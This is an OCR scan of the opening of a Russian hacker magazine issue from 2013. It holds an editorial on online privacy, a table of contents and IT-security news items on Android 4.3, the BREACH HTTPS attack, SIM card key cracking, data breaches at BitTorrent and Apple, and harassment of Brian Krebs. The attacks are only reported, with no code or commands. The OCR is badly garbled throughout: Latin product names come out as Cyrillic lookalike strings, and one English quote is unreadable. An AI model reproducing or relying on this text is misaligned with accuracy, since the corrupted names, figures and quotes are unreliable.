
Как выжить в мире, где, 
кажется, за всеми следят 



О 

БЭКДОР БОЕВОЙ ХОНИПОТ 

ПОД ІЛЧІІХ ИЗ БАЗЫ ДАННЫХ 




Как заражают АрасНе 
и другие веб-серверы 



Сногсшибательный вектор 
атак для МуЗСМ. 





Ты точно уверен, что твоя шутка, сказанная на просторах 
интернета, не выйдет тебе боком в реале. Ты знаешь, 
что в ближайшие десятилетия у тебя не будет проблем с каки- 
ми-нибудь коллекторами. Никто не будет искать тебя, пытать- 
ся пробить по номеру и социальным сетям, чтобы продолжить 
дорожно-транспортный конфликт на твоей территории. В тво- 
ей личной жизни точно не планируются крутые повороты, 
в которые, натужно гудя двигателем, мощно впишется КАМАЗ 
брутального родственника девушки и его маленькие друзья — 
баллонный ключ и монтировка. Проблемы на работе из-за 
резких высказываний в адрес руководства компании или 
правительства страны? Практически невероятно! И конечно, 
интимные фото твоей подружки никогда не станут достоянием 
развлекательных сайтов для офисного планктона. Если ты со- 
гласен со всеми приведенными утверждениями — значит, 
ты просто не держишь свои глаза открытыми. 

Добро пожаловать в реальность: XXI век буквально застав- 
ляет тебя заботиться о том , о чем следовало начать заботить- 
ся еще на заре развития сетей, — о сохранении приватности, 
анонимности, защищенности коммуникаций! ѴРІ\І, дедик 
за рубежом , н и каких реал ьн ых Ф И О в социал ьн ых сетях, ѵѵГі оі е 
сіізк епсгурйоп на ноуте и смартфоне, шифрование флешки, 
асимметричное шифрование важной переписки, І2Р, ТОР, 
серфинг по критичным сайтам — только через виртуальную 
машину! Сегодня, в 2013 году, все это должно использоваться 
самым обычным айтишником — и вовсе даже не блэкхетом 
или каким-нибудь экстремистски настроенным оппозицион- 
ным педофилом. 

Насаживай систему, читай наш журнал и да пребудет 
с тобой сила! 

Александр «Ог. КІоипіг» Лозовский 
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СРАВНИТЕЛЬНЫЙ ОБЗОР 
ЧЕТЫРЕХДИСКОВЫХ 
ЫА80В 



ПАРАНОЙЯ? 



В этом мире, кажется, за всеми 
следят. Как выжить в таких нечело- 
веческих условиях? 



ГРИГОРИЙ БАКУНОВ, 

ВЕДУЩИЙ РАДИО-Т И ДИРЕКТОР 
ПО РАСПРОСТРАНЕНИЮ 
ТЕХНОЛОГИЙ В ЯНДЕКСЕ 



Если кто-то англоязычный спрашивает меня, чем я занимаюсь, у меня есть от- 
личная фраза: I сіо ту Ъезі. Если я вижу какую-то работу, которую могу сделать, 
и понимаю, что никто больше до нее сейчас не дотягивается, я беру и делаю 







СЕНТЯБРЬ 

№176 



МЕСАЫЕШ8 
КОЛОНКА СТЁПЫ ИЛЬИНА 
РПООР-ОР-СОЫСЕРТ 
ДВАДЦАТЬ ЛЕТ ПАРАНОЙИ 
ШАПКА-НЕВИДИМКА 
МЕНЯ ЗОВУТ НИКТО 
ТАЙНИК В ОБЛАКАХ 
НАХОДКА ДЛЯ БОЛТУНА 
ТРАДИЦИОННЫЙТВИТСОСЦЕНЫ 
ЫА84Р1Ш 
А81І8Р032ЮЕ 
КУЛЬТ КАРГО НА ДИВАНЕ 
КАК ПРАВИЛ ЬНО ПОДСТУПИТЬСЯ 
КЛЮЧЕВОЙ МОМЕНТ 
ИСТОРИЯ АРМ 
НА ПОРОГЕ ПАНДЕМИИ 
КИПИТ РАБОТА НА МЕСТАХ 
ЕА8У НАСК 
ОБЗОР ЭКСПЛОЙТОВ 
КОЛОНКА СИНЦОВА 
БОЕВОЙ ХОНИПОТ ИЗ БАЗЫ ДАННЫХ 
КУКУШКА В ДЕЛЕ 
ПЕНТЕСТЭКСПЛОЙТ-ПАКА 
ОХОТА ЗА ПРИЗРАКОМ 
НАРЯЖАЕМ ОЛЬКУ 
Х-ТООІ.З 
ЛЕТОПИСЬ БУТКИТОВ 

Бэкдорподииих 

КРИПТОРНАСИШАРПЕ 
ВИДЕОЧАТ БЕЗ ПЛАГИНОВ 
ЗАДАЧИ НА СОБЕСЕДОВАНИЯХ 
МАСТЕР НА ВСЕ РУКИ 
ПАРАНОИДЛИНУКСОИД 
ВИРТУАЛОК КОМАНДИР 
УНИВЕРСАЛ В КУБЕ 
РАО ІІЫІТЕО 
ДИСКО 
ѴѴШ/2 



4 

іг 

'4 

іб 

го 

гг 

гб 

3° 

35 

40 

4* 

44 

48 
5^ 
5<? 
6г 
68 
72 
7 <* 
7 & 
8г 
88 
90 
94 
9 8 
юо 
юб 



п8 



ігб 



130 



*34 



140 
*43 
* 44 



Все новое за последний месяц 

Параноик? Нет! Кажется, нет 

Интернет через воздушные шары 

Ретроспектива болезни 

Обзор способов оставаться анонимным в Сети 

Обзор І_іѵе СО для шифрования информации и анонимности пребывания в Сети 

Поднимаем сервис для хранения и синхронизации конфиденциальных данных 

Безопасные способы общения в Сети 

Интервью с Григорием Бакуновым ака ВоЬик'ом 

Сравнительное тестирование четырехдисковых МАЗ 

4К-мониторотА51І5 

Обходим геоблокировку контент-сервисов на любых устройствах 

Средства удаленного доступа на все случаи жизни 

Обзор кросс-платформенных менеджеров паролей 

Маленькая британская компания, подарившая миру мобильную революцию 

История мобильного вирусописательства на примере АпбгоісІ 

Прошиваем, обновляем и тюнингуем смартфон, не покидая АпбгоісІ 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Скорость реакции как показатель ИБ 

Сногсшибательный вектор атак на клиенты Му50І_ 

Автоматизация поиска вредоносных файлов в корпоративной сети на базе Сискоо ЗапсІЬох 

Анализ защищенности ВІаскГіоІе ехріоіі кіі 

Криминалистический анализ слепков оперативной памяти 

Подбираем наиболее интересные плагины для популярного отладчика 

Софт для взлома и анализа безопасности 

] [-исследование: самая полная история буткитов, написанная человеком за последние 2000 лет! 

Ыпих/СсІогкесІ.А — серьезная угроза для серверов 

Защищаемся от сигнатурного сканера методами XXI века 

Юзаем ѴѴеЬВТС + сокеты для звонков из чистого браузераа 

Подборка интересных задач, которые дают на собеседованиях 

Обзор альтернативных прошивок домашних роутеров 

Г айд по обеспечению безопасности Ыпих-системы 

Обзор полезного софта для управления виртуализацией 

НР РгоЫапІ N541 07 МісгоЗегѵег: маленький сервер для больших задач 

Вопросы и ответы 

8,5 Гб всякой всячины 

Удобные ѵѵеЬ-сервисы 








































МЕСАМ ЕѴѴ8 




Мария «Мі^гіІІ» 
Нефёдова 

тіігіІІ@геаІ. хакер, ги 




АІ\ЮРОЮ4.3, 

ЧТО НОВЕНЬКОГО? 

СООСІ.Е ПРЕДСТАВИЛА НОВУЮ ВЕРСИЮ ОС 



А псІгоісІ 4.3 — уже третий релиз от Соодіе, не при- 
вносящий видимых отличий. Во многом повто- 
ряется то, как развивалась вторая ветка АпсІгоісІ: 
отличия между версиями 2.0 и 2.3 не были сильно 
заметны на глаз. Ключевые новшества новой ОС 
находятся под капотом: новые наработки в рамках 
Ргоіесі: ВиНег (увеличение отзывчивости и плав- 
ности интерфейса), поддержка ТВІМ (механизм 
эффективного управления флеш-памятью) и ВІиеІооІТі ЗтагТ 
Между тем визуальные изменения происходят в СгтіаіІ, Соодіе 
Саіепсіаг и других «фирменных» приложениях. И что самое ин- 
тересное, поскольку эти приложения обновляются напрямую 
через Соодіе РІау, новшества будут доступны пользователям 
даже устройств с АпсІгоісІ 2.2. Может быть, проблема фрагмен- 
тации все-таки преувеличена? По крайней мере, с точки зре- 
ния пользователя. 

Более интересно выглядит изменение системы привиле- 
гий: теперь есть возможность управлять уровнем доступа кон- 
кретных программ (скажем, запретить определенному при- 



ложению отслеживать месторасположение). Вот об 
этом и поговорим подробнее. 

Первые признаки внедрения системы ЗЕЫпих 
были обнаружены сообществом еще в АпсІгоісІ 4.2, но 
окончательно все заработало только в новой версии. 
Суть изменений в системе привилегий, где возможно- 
сти каждого процесса определяются администрато- 
ром, и ничто не может перезаписать их, — это, конеч- 
но, значительно улучшает и повышает безопасность. 
Даже если некая малварь была запущена в системе, 
этот процесс не повлияет на другие. Однако у этой 
медали есть и обратная сторона: это также означает, 
что с гооі:- доступом в АпсІгоісІ 4.3 все будет несколько 
сложнее, чем раньше. 

До конца оценить последствия нововведений 
сложно, но при первом приближении разработчики 
говорят, что теперь для получения полноценного рута 
потребуется заливать альтернативный образ. Такова 
плата за улучшенную защиту. 



Первые признаки ЗЕЫпих были обнаружены сообществом 
еще в Апйгоій 4 . 2 , но окончательно все заработало только 
в текущей версии 
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Ыехиз 4 

Йедізіегегі: МагсН 25, 201 3 



І_азІ Іосаіесі а* 1 :57 РМ 

Моипіаіп Ѵіеѵѵ, СА, ІІЗА - Ассигаіе 

І.аз1 изегі Зиіу 30, 201 3 



Кроме того, Соодіе 
анонсировала конку- 
рента функции РіпсІ 
Му іРИопедля Ю5- 
аппаратов. Служба 
получила название 
АпсІгоісІ Оеѵісе Мападег 
и позволит упростить 
пользователям поиск 
собственных украден- 
ных или потерянных 
устройств. Можно 
заставить девайс из- 
дать звуковой сигнал , 
посмотреть его место- 
положение на карте или 
удаленно уничтожить 
все данные. 
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МЕСАИЕѴѴ8 



5 



Ш 

ВіІТоггепі 



ВЗЛОМАТЬ ВІТТОВВЕІЧТ 
И ПОЛУЧИТЬ 500 
БАКСОВ 

ХАКЕРА ОБИДЕЛ РАЗМЕР ПРЕДЛОЖЕННОГО ВОЗНАГРАЖДЕНИЯ 



П рограммы вознаграждений за найденные уязви- 
мости получают все более широкое распростра- 
нение, и пытливые умы ежедневно проверяют 
популярные сервисы и сайты на прочность. В го- 
ловах людей все сильнее укореняется мысль, 
что за найденные баги им обязательно заплатят. Как оказа- 
лось, не всегда все так радужно. 

Недавно хакер, скрывающийся под ником МепІаЦ пове- 
дал широкой публике свою не слишком веселую историю. 
Еще в мае текущего года любознательный парень сумел по- 
лучить полный доступ к серверам компании ВИТоггепІ. Удиви- 
тельно, но ничего дурного с полученным доступом хакер де- 
лать не стал, лишь детально изучил хранящуюся на серверах 
информацию и сделал оттуда несколько бэкапов. После чего 
честно решил уведомить ВіІТоггепі Іпс. о найденной бреши. 
Сначала казалось, что все идет хорошо, — компания вырази- 
ла хакеру благодарность и пообещала денежное вознаграж- 
дение. Однако потом МепІаЬ’а попросили выслать инвойс, 
чтобы перевести ему деньги, а в итоге все и вовсе закончи- 
лось выплатой смехотворной суммы — 500 долларов. 

Стоит ли говорить, что хакера такое положение дел оскор- 
било, — в конце концов, он (или кто-либо еще) имел возмож- 
ность влезть даже в билды торрент-клиентов и финансовые 
данные компании! Раздосадованный взломщик в ответ на- 
чал публиковать утащенную с серверов информацию: Ыі. 
Іѵ/Ісхггие . 



Между тем ВіІТоггепі: 
запустил бета-версию 
сервиса ВіПоггеп* 5упс 
для автоматической 
синхронизации фай- 
лов между разными 
устройствами, что мы 
начинаем активно ис- 
пользовать в редакции. 



УЯЗВИМОСТЬ 
В НТТРЗ 

ВЗЛОМАТЬ ЗА 30 СЕКУНД 



Н а ежегодной конференции ВІаск Наі, 
прошедшей в Лас-Вегасе, был пред- 
ставлен доклад, проливающий свет 
на новую уязвимость в НТТРЗ. Атака 
получила название ВРЕАСН, она по- 
зволяет восстанавливать содержимое отдельных 
секретных идентификаторов (например, сес- 
сионные соокіе и СЗВР-токены), передаваемых 
внутри зашифрованного НТТРЗ-соединения. Ата- 
кующий может дешифровать закрытые данные, 
которые, к примеру, системы онлайн-банкинга 
и платформы электронной коммерции передают 
в ответ клиентам по протоколам ТІ_5 и 55І_. Техни- 
ка весьма схожа с методом СРІМЕ (Сотргеззіоп 
Ваііо Іпіо-Іеак Масіе Еазу), что представили в про- 
шлом году. Для осуществления атаки нужно полу- 
чить контроль над трафиком на промежуточном 
шлюзе и заставить браузер жертвы «съесть» нуж- 
ный ЗаѵаЗсгірІ-код. В зашифрованном трафике 
нужно будет выявить блоки данных с метками, 
отправляемые ЗаѵаЗсгірІ-кодом на сайт, для ко- 
торого требуется перехватить данные. Скажем, 
на восстановление СЗВР-токена у авторов мето- 
да ушло порядка 30 секунд. Точность восстанов- 
ления токенов оценивается в 95%. 




ІТЮІІ 

дгоур 






— > МаіІ.ш теперь использует 
собственный поисковый движок, 

отказавшись от поиска Соодіе. 
Месячная аудитория поиска таіі.ги 
составляет 39,5 миллиона человек. 



— > Первые деньги за уязвимости 
выплатила компания МісгозоП. 

Награды удостоился сотрудник 
Соодіе Иван Фратрич, нашедший 
дырки в ІЕ 11 . Увы, сумма не на- 
зывается. 



— > Віісоіп официально запре- 
тили в Таиланде. Департамент 
валютного регулирования и банк 
Таиланда объяснили это «отсут- 
ствием контроля за движением 
средств». 



— > Использование чужих фай- 
лов соокіе для перехвата сессии 
все еще проблема многих сер- 
висов, установил хакер Сэм Боуэн. 
Баг до сих пор работает для ІМеШх, 
Тѵѵійег, Ѵітео и других. 






6 МЕСАЫЕ ІУ5 

БОРЬБА С ѴРЫ 
УЖЕ НАЧАЛАСЬ 

ИДЕЯ ЗАПРЕТИТЬ ШИФРОВАНИЕ МНОГИМ НЕ КАЖЕТСЯ 
СТОЛЬУЖ АБСУРДНОЙ 



П ока в Сети мрачно шутят, что вслед за анти- 
пиратскими законами правительство попро- 
сту запретит использовать ѴРЫ и шифрова- 
ния, другие уже начали претворять эти идеи 
в жизнь. МазІегСагсІ и Ѵіза решили ввести 
санкции против ѴРЫ-провайдеров (ранее платежные си- 
стемы уже «бойкотировали» файлообменники сходным 
образом). Уже пострадал ѴРІ\І-провайдер іРгесІаІюг, ко- 
торый многим известен как детище одного из сооснова- 
телей ТНе Рігаіе Вау Питера Сунде. Шведская платежная 
система Раузоп ограничила доступ к сервису, получив 
«указание сверху», а именно от Ѵіза и МазіегСагсІ. Так- 
же под раздачу попали аналогичные сервисы Аппопіпе, 
МиІІѵасІ, ѴРІМТиппеІ, РгіѵаІѴРЫ. 

Разумеется, Питер Сунде молчать не стал и уже выра- 
зил недоумение по поводу того, что финансовые потоки 
блокируются без судебных санкций, кроме того, блоки- 
руются ресурсы неамериканских компаний, которые не 
имеют отношения к США и занимаются легальным бизне- 
сом. «Это уже даже не глобальная слежка АНБ, это просто 
какое-то безумие», — заявил Сунде. 




Заметим, что похожие 
методы борьбы ис- 
пользует и РауРаІ, так- 
же начавший недавно 
отклонять платежи по- 
добных поставщиков. 
Атем, кто сейчас по- 
думал об интересных 
альтернативах вроде 
Віісоіп, напомним, что 
ВС недавно уже запре- 
тили в Таиланде. 





— > Джон Кармак присоединился 
к проекту Осиіиз, разрабаты- 
вающему устройство Осиіиз ВІЙ, 
в качестве СТО. Однако ісі ЗоЙѵѵаге 
Кармак не покидает. 



— > Е5ЕТ сообщает: 60% рос- 
сийских пользователей хоть раз 
теряли контроль над своим акка- 
унтом в соцсетях. Еще 25% юзеров 
взламывали неоднократно. 
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— > Недавно компания представила 
годовой отчет, который показал, что 
убытки в связи с переоценкой склад- 
ских запасов планшетов Зигіасе ПТ 
составляют 900 миллионов долларов. 
Выяснилось, что сами планшеты пока не 
принесли компании ни цента прибыли. 
После этого известия акции Мі егозой 
рухнули за день на 11,4%. 
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КНИГ В РУНЕТЕ 
ВОРОВАННЫЕ 



Интересное исследование приводит 
издание гЫН.ш. Согласно ему, около 92% 
всех электронных книг россияне не по- 
купают, а попросту скачивают бесплатно 
со всем известных ресурсов. Скажем, 
в США этот показатель не превышает 
12%. По данным того же исследования, 
в России на «цифру» перешло уже 70% 
аудитории. 
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ОООСШЕ-ГАДЖЕТЫ 

ВТОРОЕ ПОКОЛЕНИЕ ЫЕХУ8 7 И СООСІ.Е СНПОМЕСА8Т 



П омимо анонса новой версии АпсІгоісІ, компания Соодіе также порадовала 
пользователей сразу двумя железками, а информацию о девайсе СІіготесазІ: 
компании и вовсе удавалось сохранить втайне почти до самого анонса. 

Но сначала поговорим о том, чего Соодіе не скрывала, — о втором по- 
колении планшетов Ыехиз 7. Этот аппарат стал первым анонсированным 
устройством на базе новой ОС АпсІгоісІ 4.3, с которой был представлен в один день. Планшет 
по-прежнему семидюймовый, однако изменилось разрешение экрана: теперь 1920 * 1080 
точек, то есть наконец-то РиІІ Нй. Хотя дизайн остался практически неизменным, устрой- 
ство «похудело», став на три миллиметра тоньше и на пятьдесят граммов легче предше- 
ственника. Также на задней стороне появилась камера 5 Мп, которой не было в первом 
ІМехиз 7. Как уже должно стать ясно, обновления коснулись в основном внутренностей план- 
шета. Так, второе поколение получило на борт четырехъядерный процессор Зпарсігадоп 34 
Рго и 2 Гб оперативной памяти. Новый ІМехиз 7 поставляется в трех вариантах: с 16 Гб или 

32 Гб встроенной памяти, плюс старшая 
модель может поддерживать или только 
ѴѴі-Гі, или ѴѴі-Гі + І_ТЕ. Отдельно радует 
весьма демократичная цена: 229 долла- 
ров за младшую версию и 349 за самую 
продвинутую. 

Если анонс ІМехиз 7 мало кого удивил, 
то представленное почти одновремен- 
но устройство Соодіе СІіготесазІ: ста- 
ло сюрпризом почти для всех. Что это 
за свисток, спросишь ты, глядя на фото? 
Это миниатюрное устройство (12 х 12 см) 
подключается к НЭМІ- входу ТВ или реси- 
вера и воспроизводит онлайн-контент, 
будь то видео, аудио или фото. Инте- 
ресно, что своих органов управления 
и/или интерфейса СІіготесазІ: не име- 
ет, — для управления тебе понадобится 
подключить к сети любое устройство 
с АпсІгоісІ или ЮЗ на борту или попросту браузер СІіготе. Выгодное отличие от АігРІау, вер- 
но? Само устройство, по сути, ОІАЬ-сервер, разработанный недавно УоиТиЬе и ІМеШх (это 
не протокол потокового вещания, это метапротокол, запускающий драйверы протоколов 
на устройстве-приемнике). Плеером в данном случае выступает сам СІіготесазІ:, стриминг 
того же УоиТиЬе напрямую идет по ѴѴі-Гі на него, а другие устройства лишь играют роль 
пульта ДУ. Разумеется, должна быть хоть какая-то ложка дегтя. Во-первых, СІіготесазІ: нуж- 
но питание, так как ГЮМІ для этих целей не хватит. Запитать девайс можно от ІІЗВ-портов 
ТВ или от розетки, подключив к нему блок питания (входит в комплект). Во-вторых, пока 
для устройства есть всего три приложения: УоиТиЬе, ІМеШх и Соодіе РІау. Однако нужно от- 
дать должное — работают все три отлично. Ну и последнее — цена СІіготесазІ: в США со- 
ставляет всего 35 долларов. 



Для СІіготесазІ есть 
пока всего три при- 
ложения: УоиТиЬе, 
Ые1(Их и Соодіе РІау . 
Однако нужно от- 
дать должное — ра- 
ботают все три 
отлично 




На дол ю первого Ыехиз 7 пришлось почти 1 0% от всех продаж планшетов на АпсІгоісІ за последний 
год. В Соодіе уверены, что вторая версия покажет себя как минимум не хуже. 




ООООЬЕ ВЫПУСТИЛА 
ПАТЧ ДЛЯ НАШУМЕВШЕЙ 
ДЫРКИ 

— > Не так давно компания ВІиеЬох обнаружила 
уязвимость в АпсІгоісІ, затрагивающую почти 900 
миллионов устройств. Уязвимость позволяет зло- 
умышленнику модифицировать файл АРК, не меняя 
его криптографической подписи. Другими словами, в 
любое приложение можно добавить троян, сохранив 
криптографическую подпись оригинального автора. 




ЛЯПЫ В ХОДЕ БОРЬБЫ 
С ПИРАТСТВОМ 

— > Не секрет, что борьба с пиратством на Западе по- 
ставлена на поток и автоматизирована. Так, недавно 
телекомпания НВО попросила Соодіе «закрыть» стра- 
ницу, где можно скачать ѴІ_С Мебіа РІауег. Конечно, ро- 
бот, собирающий ссылки на «Игру престолов» и другие 
шоу НВО, просто ошибся, но ошибка тревожная. 



°3 



ЕЩЕ ОДИН 

«КРУПНЕЙШИЙ ВЗЛОМ 
В ИСТОРИИ» 

— > В США раскрыли очередную «аферу века». На этот 
раз Минюст США рассказал о предъявлении обвине- 
ния пяти кардерам, которые в сумме ответственны 
за хищение дампов более 160 миллионов банковских 
карт. В корпоративные сети банков взломщики про- 
бирались в основном при помощи ЗОЬ-инъекций. 
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ЗІМ-КАРТЫ В ОПАСНОСТИ 

ФУНДАМЕНТАЛЬНАЯ УЯЗВИМОСТЬ ОБНАРУЖЕНА В СОВРЕМЕННЫХ ЗІМ’КАХ 



риптолог и исследователь Карстен Нол, известный, к примеру, тем, что в 2009 
году обнаружил серьезную уязвимость в протоколе СЗМ, нашел новую дыру 
в безопасности сотовых сетей. На этот раз проблема в самих 31 М -картах. 

На прошедшей недавно ВІаск НаТ Нол зачитал подробный доклад о найден- 
ной проблеме. Оказывается, еще в 2011 году Нол и его компания ЗесигіТу ВезеагсЬ І_аЬ 
приступили к изучению протокола ОТА (оѵег-ТЬе-аіг, когда устройство «по воздуху» полу- 
чает особые, бинарного вида 8М5). Данный протокол используется для удаленного об- 
новления ПО на ЗІМ-картах, ведь каждая ЗІМ’ка — устройство сложное, по сути настоящий 
микрокомпьютер с процессором, РАМ, РОМ, микросхемой памяти, поддерживающей 
шифрование, и операционной системой. Карты, разумеется, бывают разные, различ- 
ных стандартов, их отличает объем памяти и функционал. Возможности ЗІМ-карт можно 
расширять с помощью специализированного ПО, написанного на базе Оаѵа. То есть со- 
временная ЗІМ-карта работает под управлением довольно простой ОС, реализованной 
с помощью Оаѵа СагсІ. Именно Оаѵа СагсІ обеспечивает работу небольших апплетов в пе- 
сочнице, предотвращая утечку важных данных из одних приложений в другие. Однако Нол 
и его коллеги выяснили, что Оаѵа СагсІ исходно неправильно сконфигурирована и генери- 
рует крайне слабые ключи, используя шифр РаТа ЕпсгурТіоп ЗТапсІагсІз (РЕЗ), созданный 
в еще 70-е годы! 

Итак, на практике все это может обернуться вот чем. На сайте Зесигііу ВезеагсЬ І_аЬ 
Нол пишет: «Когда атакующий отправляет на устройство собственное бинарное ЗМЗ, ЗІМ- 
карта не станет исполнять некорректно подписанные ОТА-команды. Однако во многих 

случаях на попытку атаки карта ответит 
ошибкой, переслав код ошибки, содер- 
жащий криптографическую сигнатуру, 
и отправив ее посредством такого же 
бинарного ЗМЗ. С помощью радужной 
таблицы компьютер способен преобра- 
зовать это сообщение в 56-значный 0Е5- 
ключ примерно за две минуты». Дальше 
злоумышленник уже может подписывать 
свои бинарные ЗМЗ полученным ключом 
и, по сути, может сделать с телефоном 
все что захочет — запросить местора- 
сположение, похитить данные, слать 
ЗМЗ на платные номера или вообще кло- 
нировать карту. 



Уязвимость Карстен 
Нол проверял при- 
мерно на тысяче 
телефонов с разными 
ЗІМ-картами, разных 
стран и операторов. 
Итог довольно печален: 
уязвима каждая вось- 
мая трубка. Отсюда 
исследователь сделал 
вывод, что на сегодня 
уязвимы примерно 750 
миллионов устройств 
в мире. В качестве «ле- 
карства» Нол выдвинул 
идею фильтровать ЗМЗ 
внутри сетей опера- 
торов. 





После взлома хакер 
может запросить 
месторасположение 
устройства, похи- 
тить данные или 
вообще клонировать 
5ІМ-карту 





МЕТРО СЛЕДИТ 
ЗА ТОБОЙ 



— > Московское метро вводит два новшества. 

Первое — видеосистема, распознающая лица. Также 
у пассажиров будут считывать данные ЗІМ-карт. По не- 
подтвержденным данным, использоваться будут ІМЗІ- 
саТсЬег’ы, притворяющиеся базовыми станциями и 
считывающие уникальные идентификаторы абонентов. 




ОФИСНЫЕ ОБНОВЛЕНИЯ 



— > Вслед друг за другом вышли обновления популяр- 
ных офисных пакетов ЫЬгеОТТісе 4.1 и Ореп ОТТісе 
4.0, некогда основанных на единой базе. Изменений 
немало. Так, в ЫЬгеОТТісе появились боковые панели 
и было исправлено три тысячи ошибок. А в Ореп ОТТісе 
радикально переработан весь интерфейс. 




ПРЕДУПРЕЖДЕНИЯ? КА- 
КИЕ ПРЕДУПРЕЖДЕНИЯ? 

— > Университет Беркли совместно с разработчиками 
Соодіе выяснил, что пользователи фактически игно- 
рируют предупреждения о безопасности в браузере. 
Сообщение о неверном ЗЗЬ-сертификате пропустили 
70,2% юзеров СЬгопле. Еще 15,1% оставили без вни- 
мания сообщение о малвари на сайте. 
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БРАЙАН КРЕБС 
И ГЕРОИН 

КАРДЕРЫ ПРОДОЛЖАЮТ ВОЙНУ С ИБ-ЭКСПЕРТОМ 



В Іаск На1:’ы всего мира определенно не любят Брайана 
Кребса. Недавно мы рассказывали о том, как недоволь- 
ные исследованиями и разоблачениями Кребса хакеры 
и кардеры вызвали к эксперту домой группу спецназа, 
еще раньше на имя Кребса взяли кредит в размере 20 ты- 
сяч долларов, а также журналисту не раз присылали деньги с укра- 
денных банковских карт. История получила закономерное продол- 
жение, на этот раз Кребсу прислали... героин. 

Новую подставу, по словам Кребса, спланировали на одном из 
закрытых русскоязычных форумов. Среди мемберов был объявлен 
сбор Віісоіп «Кребсу на наркотики», то есть для покупки грамма ге- 
роина в магазине, работающем через Тог и расположенном в зоне 
.опіоп. Довольно быстро удалось собрать больше двух биткоинов, 
и 12 пакетиков с порошком (10 + 2 бонусных) по цене 1,6532 ВС 
отправились на адрес Брайана по почте. Шутники собирались со- 
общить в полицию о том, что Кребсу должна прийти партия нар- 
котиков, таким образом гарантированно подставив журналиста. 
Но фокус не удался. Оказалось, что Кребс наблюдал за операци- 
ей с самого начала и давно предупредил ФБР и полицию, что ему 
скоро пришлют компрометирующие вещества. Пришедшую в на- 
значенный день посылку, в которой действительно был порошок, 
спрятанный в глянцевом журнале, попросту забрал наряд полиции. 




В интервью Ѵісе 
один из организа- 
торов «розыгры- 
ша» пояснил, что 
сделано все это 
было «ради лулзов» 
и потому, что Кребс 
по сей день опла- 
чивает свои ланчи 
деньгами, которые 
утекают по его 
вине из карманов 
кардеров. 




I ЬаѵесіопеАІІ іЬезе репіезі, асІЬегіпд Іо 
іЬе гедиіаіюпз апгі Іаѵѵ апб ѵѵтйюи! 
сіатадіпд ІЬе ргезйде оНЬе сотрапу, ой 
сои гзе йѵз сап по! Ье ехрпеззесі іп ѵѵогсіз 
Ьоѵѵ тисП I Іоѵе йоіпд ту рЬ. I Ьаѵе аІІ №е 
деЬкіеб Ьидз герогіесі арріе сотрапу апгі 
ѵѵагЬпдІоЬейхесІ. I ѵѵіІІ Ьесіеіеііпд аІІ йіе 
сіаіаз I Ьаѵе, опіу до! аІІ йіезе сіаіаз Іо зее 
Іиз! Іюѵѵ сіеер I сап до. аізо Иаѵе іпЬгтесІ 
арріе Ьейхе іакіпд ІЬезе бзЛаз. 



ТЬапк уои !о г діѵіпд уоиг йте ѵѵа!с!ііпд Иііз ѵісіео.. 



ВЗЛОМАН АРРБЕБЕѴ 
СЕКІТЕВ 

ХАКЕР ПОПРАКТИКОВАЛСЯ НА САЙТЕ ДЛЯ РАЗРАБОТЧИКОВ 



В прошедшем месяце многие СМИ писали о взломе сайта для раз- 
работчиков Арріе, однако продолжение этой истории почему-то 
освещали уже не так широко. Дело в том, что взломщик сам при- 
знался в содеянном, появившись в комментариях к статье про 
взлом Арріе йеѵ Сепіег на іесіісгипсіі.сот. «Виновником торжества» оказался 
турецкий программист Ибрагим Балик, по совместительству выступающий 
консультантом по безопасности. Сайт Арріе Балик решил поковырять исклю- 
чительно в целях общего развития и самообразования и с удивлением обна- 
ружил 13 уязвимостей, благодаря которым без труда получил доступ к базам 
данных. О своей находке «хакер» тут же уведомил Арріе, правда предвари- 
тельно сохранив персональные данные примерно ста тысяч разработчиков. 
Собственно, кусок именно этих данных Балик предъявил в Сети в доказатель- 
ство ответственности за взлом. 

В ответ на поступившую информацию о дырках Арріе даже была вынужде- 
на отключить сайт, чтобы исправить уязвимости и заново развернуть инфра- 
структуру (полное восстановление заняло больше недели!). Балик пишет, что 
теперь опасается судебного преследования, хотя он не желал ничего дурного 
и им руководило простое любопытство. 

Сайт Арріе Балик решил поковырять 
исключительно в целях общего раз- 
вития и с удивлением обнаружил і з 
уязвимостей, благодаря которым 
получил доступ к базам данных 




АсіоЬе провела месяц «по- 
нимания пиратов». Компания 
прекратила десяток уголовных дел 
против пиратов и снизила цены 
на свои продукты на 40%. 



— > За последние полгода 
специалисты центра СЕВТ-СІВ 
выявили 896 вредоносных до- 
менов, угрожающих безопасности 
пользователей Рунета. 86% сняли 
с делегирования. 



— > Массовая атака, нацелен- 
ная на сайты, работающие под 
управлением Зоопліа и ѴѴогсІРгезз, 
связана с распространением 
Тгоіап.ѴѴРСгаскег.1, сообщает 
«Доктор Веб». 



— > Ріге^ох обновился до версии 

23 , принесшей важное изменение 
в безопасности: запрет по умол- 
чанию на смешанный контент 
(сайты, работающие по НТТР5, но 
содержащие НТТР-контент). 
















показатели. 



ТЫСЯЧ ДОЛЛАРОВ 
СРЕДНЯЯ ЗАРПЛАТА 
ИБ-СПЕЦИАЛИСТА 
В США 



На западном рынке зреет серьезный 
недостаток профессиональных хаке- 
ров, сообщает компания Вигпіпд СІазз 
ТесИпоІодіез. Уже сегодня ощущается 
нехватка 20-40 тысяч ИБ-специалистов, 
и в будущем станет только хуже. Зарплаты 
меж тем закономерно растут: средний 
«безопасник» в США получает 116 тысяч 
долларов в год, или 55,77 в час. 



4 *^ 

— > Миллион долларов возна- 
граждений выплатила РасеЬоок 
за найденные уязвимости. Награды 
получили уже 329 хакеров, самому 
младшему из которых всего 13 лет. 



— > Про РЕР СОЫ сняли докумен- 
тальный фильм. Почти двухча- 
совая лента о самой крутой кон- 
ференции доступна совершенно 
бесплатно: ѵоиіи.ЬеМАл/аІебСіНѵѵ . 
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МЕСАЫЕѴѴЗ 



МИЛЛИАРДА 



ДОЛЛАРОВ СТОИ- 
МОСТЬ КОРПОРАЦИИ 
ООООЬЕ 



— > Акции Соодіе установили новый 
рекорд — их стоимость возросла на 7,32% 
и достигла отметки 926,47 доллара за еди- 
ницу. Так, сейчас Соодіе можно оценить 
в 304 миллиарда долларов, что на 50 
миллиардов больше прошлого показателя. 
Аналитики предрекают, что прибыль Соодіе 
в текущем квартале превысит ожидаемые 



КАСТОМИЗИРУЕМ ЫІ 
СМАРТФОН 
ОТМОТОВОИА 



НОВИНКА, ИНТЕРЕСНАЯ НЕТОЛЬКО НАРАЩИВАНИЕМ ЯДЕР 



отя компания Моіогоіа официально покинула рос- 
сийский рынок, поклонников гаджетов именно этого 
бренда у нас по-прежнему много. Представленная 
недавно новинка Моіо X доказывает, что Моіогоіа 
мы продолжаем любить не зря :). 

